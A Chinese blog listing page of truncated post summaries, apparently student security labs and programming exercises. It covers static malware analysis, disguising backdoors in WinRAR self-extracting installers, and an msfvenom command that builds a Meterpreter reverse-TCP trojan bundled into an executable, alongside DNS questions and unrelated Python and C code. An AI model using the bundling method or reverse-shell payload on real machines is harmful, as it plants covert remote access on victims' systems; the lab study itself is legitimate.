摘要:
0. 我们首先对这个程序做一下初步的静态分析,string查看一下,发现这里出现了一个URL,还有一些导入函数的名称,但是在这里分析这些导入函数并不是很方便,我们打开dependency walker,这里有很多这个程序使用了很多函数,通过它调用函数的内容,就可以初步判断它的行为。可以发现这里有一个 阅读全文
摘要:
后门捆绑实践 原理:有一些压缩工具,如WinRAR打包文件时可以设置在解压时自动解压并自动运行某个文件,还可以选择将压缩结果制作成为exe文件。运行此exe文件后会自动解压到指定路径,运行压缩前指定的文件,前提是这个指定的文件也是压缩的对象 捆绑到安装程序上 条件准备: 1.图标 根据使用情况准 阅读全文
摘要:
# Lab3-3 1.查壳 经过PEiD分析,Lab03-03没有加壳 2.Process Explore分析 操作系统:Microsoft Windows XP [Version 5.1.2600](中文版) 操作系统:Microsoft Windows XP [Version 5.1.2600 阅读全文
摘要:
尝试与实践 exe与shellcode捆绑 经过查阅网上相关资料,kali中在终端输入以下指令以生成木马并捆绑到目标程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4314 -x hellowor 阅读全文
摘要:
# EXP 5 回答问题 (1)哪些组织负责DNS,IP的管理。 ICANN(Internet 域名与地址管理机构)负责全球的DNS、IP和域名根服务器的管理。 ICANN是为承担域名系统管理IP地址分配,协议参数配置,以及主服务器系统管理等职能而设立的非盈利机构。 (2)什么是3R信息。 注册人 阅读全文
摘要:
# EXP 5 回答问题 (1)哪些组织负责DNS,IP的管理。 ICANN(Internet 域名与地址管理机构)负责全球的DNS、IP和域名根服务器的管理。 ICANN是为承担域名系统管理IP地址分配,协议参数配置,以及主服务器系统管理等职能而设立的非盈利机构。 (2)什么是3R信息。 注册人 阅读全文
摘要:
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件,感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 阅读全文
摘要:
python项目代码 点击查看代码 # -*- coding: utf-8 -*- import jieba import matplotlib.pyplot as plt import numpy as np from PIL import Image import pymysql import 阅读全文
摘要:
今天先记录一下这一道题: 题目如下这是一道比较重要的题目:难度为“High”,先来看看题目吧! 在提示“Hint”里面已经把要点给写出来了,这道题看似复杂,可以将它划分为两步来操作: 1.先实现输出距离 2.再实现整体功能 一、先实现输出距离: 利用两个变量a,b;a就是第一行的输入,b放在循环中, 阅读全文
摘要:
#include <stdio.h> #include <stdlib.h> typedef struct node { int key; struct node *next; }NODE; void DisplayNode(NODE *p) { while(p->next!=NULL) { pri 阅读全文